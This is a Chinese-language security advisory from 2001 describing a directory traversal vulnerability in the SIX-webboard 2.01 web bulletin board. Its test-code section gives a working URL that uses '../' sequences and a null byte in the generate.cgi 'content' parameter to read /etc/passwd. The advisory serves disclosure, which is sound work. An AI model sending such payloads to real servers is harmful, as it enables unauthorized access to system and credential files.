xfocus logo xfocus title
首页 焦点原创 安全文摘 安全工具 安全漏洞 焦点项目 焦点论坛 关于我们
English Version

SIX-webboard 2.01 存在可显示文件漏洞


发布时间:2001-08-14
更新时间:2001-08-14
严重程度:
威胁程度:远程非授权文件存取
错误类型:输入验证错误
利用方式:服务器模式

受影响系统
SIX-webboard 2.01
详细描述
SIX-webboard 2.01 是由Pipo (webmaster@sixhead.com)编码的流行WEB
公告版程序,更多信息你可以查看此地址:http://www.sixhead.com
其中对用户的输入处理没有很好的检查,提交'..'和'/'的URL请求可以导致
目标文件的泄露。

测试代码
http://www.target.net/cgi-bin/webboard/generate.cgi
?content=../../../../../../../../../etc/passwd%
00&board=boardsname

解决方案
尚无

相关信息
Hannibal Lector (digitalseed@poizonb0x.org)